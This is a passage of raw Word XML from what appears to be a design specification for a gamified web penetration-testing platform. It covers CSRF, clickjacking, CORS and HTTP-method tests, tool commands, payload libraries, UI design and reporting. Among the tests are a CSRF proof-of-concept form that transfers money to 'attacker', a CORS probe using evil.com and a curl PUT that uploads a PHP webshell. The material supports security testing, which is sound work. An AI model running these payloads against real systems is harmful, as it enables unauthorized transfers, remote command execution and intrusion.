              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Right-click → Engagement Tools → Generate CSRF PoC</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Copy HTML → Save as csrf.html → Host on different domain</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Open in browser while logged in → If action executes: VULNERABLE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Manual CSRF PoC:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;html&gt;&lt;body&gt;&lt;form action="https://target.com/transfer" method="POST"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;input type="hidden" name="amount" value="1000"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;input type="hidden" name="to" value="attacker"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;input type="submit" value="Click me"&gt;&lt;/form&gt;&lt;/body&gt;&lt;/html&gt;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CSRF Token Bypass Attempts:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">- Remove CSRF token parameter entirely → If succeeds: bypass found</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">- Use empty token value: csrf_token="" → Check if accepted</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">- Use different user's valid CSRF token → Check if validated per-user</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">- Change POST to GET: GET /transfer?amount=1000&amp;to=attacker</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13.2 Clickjacking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Quick Clickjacking Test:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;iframe src="https://target.com/sensitive-action" style="width:500px;height:500px"&gt;&lt;/iframe&gt;</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Save as clickjack.html → Open in browser → If page loads in iframe: VULNERABLE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Check for X-Frame-Options header:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -I https://target.com | grep -i "x-frame-options"</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Check for CSP frame-ancestors:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -I https://target.com | grep -i "content-security-policy"</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Should see: X-Frame-Options: DENY or CSP: frame-ancestors 'none'</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13.3 Content Security Policy (CSP)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CSP Header Present?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curl -I target.com | grep -i content-security-policy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CSP Analysis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Paste CSP value at: https://csp-evaluator.withgoogle.com/ → Check for bypasses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Unsafe Inline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Look for: unsafe-inline in script-src → CSP bypass possible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Unsafe Eval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Look for: unsafe-eval → DOM-based XSS possible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Wildcard Domains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script-src *.googleapis.com → JSONP endpoints can bypass CSP</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Missing Directives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default-src? No object-src? → Plugin content can bypass CSP</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14. Test Phase 8 — Transport &amp; Cryptography</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14.1 HTTP Security Headers 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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Risk if Missing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Strict-Transport-Security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max-age=31536000; includeSubDomains; preload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MITM, SSL stripping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X-Content-Type-Options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nosniff</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MIME sniffing attacks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X-Frame-Options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DENY or SAMEORIGIN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Clickjacking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X-XSS-Protection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 mode=block</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Reflected XSS (legacy)</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Content-Security-Policy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Strict CSP with no unsafe-inline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XSS, data injection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Referrer-Policy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strict-origin-when-cross-origin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Information leakage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Permissions-Policy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camera=(), microphone=(), geolocation=()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Feature abuse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Cache-Control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no-store, no-cache (auth pages)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Sensitive data in cache</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14.2 CORS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CORS Misconfiguration Test:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -H "Origin: https://evil.com" -I https://target.com/api/user</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Check response for:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Access-Control-Allow-Origin: https://evil.com  (VULNERABLE — reflected origin)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Access-Control-Allow-Origin: *  (VULNERABLE — wildcard)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Access-Control-Allow-Credentials: true  (with wildcard = critical)</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Null origin test:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -H "Origin: null" -I https://target.com/api/user</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Tool: CORS Scanner:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python cors_scanner.py -u https://target.com/api/ --headers</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15. Test Phase 9 — Infrastructure &amp; Configuration</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15.1 HTTP Methods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 Check allowed methods:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -X OPTIONS https://target.com -i | grep -i allow</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Test dangerous methods:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -X TRACE https://target.com -i  (Cross-Site Tracing)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -X DELETE https://target.com/api/users/1 -i  (Unauthorized deletion)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -X PUT https://target.com/files/shell.php -d "&lt;?php system($_GET['c'])?&gt;" -i  (Webshell upload)</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 Nikto web server scanner:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">nikto -h https://target.com -output nikto_results.txt -Format txt</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16. Test Phase 10 — Automated Tool Integration</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This phase provides the tester with a curated list of automated tools to run, with exact commands pre-filled based on the target URL from the project setup.</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16.1 Complete Tool Execution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Command Template (URL auto-filled from project)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Nuclei</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CVE &amp; Misconfiguration Scanning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nuclei -u {TARGET_URL} -t ~/nuclei-templates/ -severity critical,high,medium -o nuclei.txt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ffuf</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Directory &amp; Content Discovery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ffuf -w SecLists/Discovery/Web-Content/raft-large-directories.txt -u {TARGET_URL}/FUZZ -mc 200,301,302,403</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sqlmap</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 Injection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sqlmap -u "{TARGET_URL}?id=1" --level=5 --risk=3 --dbs --batch</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SSL/TLS Analysis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testssl.sh --full {TARGET_HOST}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nikto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Web Server Misconfiguration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nikto -h {TARGET_URL} -output nikto.txt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subjack</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Subdomain Takeover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subjack -w subdomains.txt -t 100 -timeout 30 -o subjack.txt -ssl</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XSStrike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XSS Discovery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xsstrike.py -u "{TARGET_URL}?q=test" --crawl</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wfuzz</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Parameter Fuzzing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wfuzz -c -z file,SecLists/Discovery/Web-Content/api-endpoints.txt {TARGET_URL}/FUZZ</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jwt_tool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JWT Attack Suite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jwt_tool {JWT_TOKEN} -M at -t {TARGET_URL}/api/user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arjun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 Parameter Discovery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arjun -u {TARGET_URL}/api/endpoint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LinkFinder</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 Endpoint Extraction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linkfinder.py -i {TARGET_URL} -d -o cli</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ParamSpider</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Parameter Mining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paramspider.py --domain {TARGET_DOMAIN}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">17. Payload Library &amp; Reference</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All payloads in the platform are sourced from PayloadsAllTheThings (swisskyrepo/PayloadsAllTheThings) and SecLists (danielmiessler/SecLists). The database stores all payloads with metadata for contextual display.</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17.1 Payload Categories in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Payload Count (Approximate) &amp; Source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 Injection (Error, Boolean, Time, Union)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500+ payloads — PayloadsAllTheThings/SQL Injection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XSS (Reflected, Stored, DOM, Filter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300+ payloads — PayloadsAllTheThings/XSS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SSTI (All Major Frameworks)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 payloads — PayloadsAllTheThings/SSTI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SSRF (Standard, Cloud,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80+ payloads — PayloadsAllTheThings/SSRF</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XXE (Standard, Blind, SVG)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40+ payloads — PayloadsAllTheThings/XXE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Command Injection (Linux, Windows, Blind)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100+ payloads — PayloadsAllTheThings/Command Injection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Path Traversal (Linux, Windows, Encoded)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80+ payloads — PayloadsAllTheThings/Path Traversal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LDAP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30+ payloads — PayloadsAllTheThings/LDAP</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Attacks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20+ attack patterns — jwt.io + jwt_tool docs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GraphQL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30+ payloads — PayloadsAllTheThings/GraphQL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Template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 per engine — PayloadsAllTheThings/SSTI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Header Injection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40+ payloads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Redirect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 payloads — PayloadsAllTheThings/Open Redirect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Upload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60+ techniques — PayloadsAllTheThings/Upload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Authentication Bypass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100+ payloads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CSRF</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20+ PoC templates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17.2 SecLists Wordlists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SecLists Path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Directory Busting (Medium)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Discovery/Web-Content/directory-list-2.3-medium.txt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Directory Busting (Large)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Discovery/Web-Content/directory-list-2.3-big.txt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Common Files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Discovery/Web-Content/common.txt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Endpoints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Discovery/Web-Content/api/api-endpoints.txt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 Files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Discovery/Web-Content/raft-large-extensions.txt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Username List (Common)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Usernames/Names/names.txt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List (Top 100)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Passwords/Common-Credentials/10-million-password-list-top-100.txt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List (Best 110)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Passwords/Common-Credentials/best110.txt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Credentials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Passwords/Default-Credentials/default-passwords.csv</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Subdomains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Discovery/DNS/subdomains-top1million-5000.txt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SQLi Payloads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Fuzzing/SQLi/Generic-SQLi.txt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XSS Payloads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Fuzzing/XSS/XSS-Jhaddix.txt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SSRF Payloads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Fuzzing/SSRF/SSRF-candidates.txt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Secrets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Passwords/Leaked-Databases/rockyou.txt (for JWT cracking)</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18. UI/UX Design System &amp; Animations</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18.1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DESIGN PRINCIPLE: "Military Operations Center meets Gaming HUD"</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Dark theme by default (reduces eye strain during long testing sessions). Clean, focused layout that eliminates distractions. Progressive disclosure — only show what's needed NOW. Micro-interactions that reward progress. High contrast for code/payload blocks.</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18.2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35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--bg-primary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#0A0F1E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Main background — deep navy</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--bg-secondary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#111827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Card backgrounds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--bg-tertiary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#1F2937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Input fields, code blocks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--accent-blue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#3B82F6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Primary actions, links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--accent-cyan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#06B6D4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Interactive highlights, phase indicators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--accent-green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#10B981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Pass/success states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--accent-red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#EF4444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Fail/critical states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--accent-yellow</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#F59E0B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Warning, NA states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--accent-purple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#8B5CF6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XP points, achievements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--text-primary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#F9FAFB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Primary text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--text-secondary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#9CA3AF</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Secondary/muted text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--text-code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#A5F3FC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Code/payload text (cyan tint)</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18.3 Key Animations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 Transitions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AnimatePresence + motion.div with: opacity 0→1, y: 20→0, duration: 0.3s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 Case Reveal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Staggered children: each test case fades in with 0.05s delay per item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 Bar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motion value + useSpring for smooth progress updates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Completion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Confetti via react-confetti + scale 0→1.2→1 bounce animation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Achievement Popup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Slide in from top-right + auto-dismiss after 4s + shake animation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XP Counter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useMotionValue + useTransform for animated number increment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Card Hover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whileHover: { scale: 1.02, boxShadow: "0 20px 40px rgba(59,130,246,0.2)" }</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Button Click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whileTap: { scale: 0.95 } on all interactive elements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Zone Lock/Unlock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Radial reveal animation when zone becomes available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Finding Pulse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CSS keyframes pulse + ring animation for critical findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">19. Gamification &amp; Psychology Engine</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19.1 Psychological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 Visibility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Always visible top progress bar — Zeigarnik effect (incomplete tasks stay in mind)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Variable Reward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Bonus XP amounts vary — unpredictable rewards are more engaging than fixed ones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Social Proof</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Leaderboard showing top testers in organization — drives competitive engagement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Mastery Progression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 levels of expertise — each level unlocks new features/themes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Chunking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Break 1000+ test cases into phases of 50-100 — prevents overwhelm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Just-in-time Info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Show tool command only when tester reaches that specific test — not all at once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Autonomy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Tester can mark test cases NA, skip, reorder within phase — sense of control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Purpose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Show real-world impact: "This finding type has led to $X breaches" — motivation</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19.2 Personalized Achievement Messages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All achievement popups include the TESTER'S NAME prominently. Examples:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"🎯 Well done, Rahul! You've found your first SQL Injection — that's a critical catch!"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"🔥 Priya is on fire! Phase 3 complete — Authentication testing mastered!"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"⚡ Amazing work, Arjun! You've completed 50% of this mission — halfway to victory!"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"🏆 Outstanding, Neha! Mission complete — 100% coverage achieved! Report ready."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"🚨 Critical catch by Ravi! A CRITICAL severity finding documented — exceptional testing!"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">20. Reports &amp; Dashboard</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20.1 Project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Mission Control Card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Project name, tester names, app name, overall % complete, status badge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Coverage Ring Chart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Donut chart: Tested / Passed / Failed / NA / Not Started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Progress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 phase cards, each with mini progress bar and % complete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Findings Severity Chart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Bar chart: Critical / High / Medium / Low / Info count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Timeline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Gantt-style timeline: start date, milestones, target end date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Testing Velocity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Line chart: test cases completed per day (shows testing intensity)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Top Findings Preview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List of top 5 critical/high findings with quick details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Tester Leaderboard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Which tester completed most test cases in this project</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20.2 Executive Report Structure (Auto-Generated)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Cover Page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 name, version, tester names, lead, dates, classification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Executive Summary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rating, total findings by severity, overall security posture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Scope &amp; Methodology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Testing scope, tools used, testing type, environment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Findings Summary Table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findings with: ID, Title, Severity, Status, CVSS, Location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Detailed Findings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Per finding: Description, Impact, Evidence, Reproduction Steps, Recommendation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OWASP Top 10 Coverage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Heatmap showing which OWASP categories were affected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 Case Coverage Statistics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Total applicable / Tested / Pass / Fail / NA with percentages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Appendix</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test case results, tool outputs, raw data</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20.3 Export Formats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML Report — Interactive, searchable, charts included — Share via link or download</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DOCX Report — Professional Word document for client delivery (python-docx)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PDF Report — WeasyPrint-rendered PDF from HTML template</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JSON Export — Machine-readable findings for JIRA/ticketing integration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
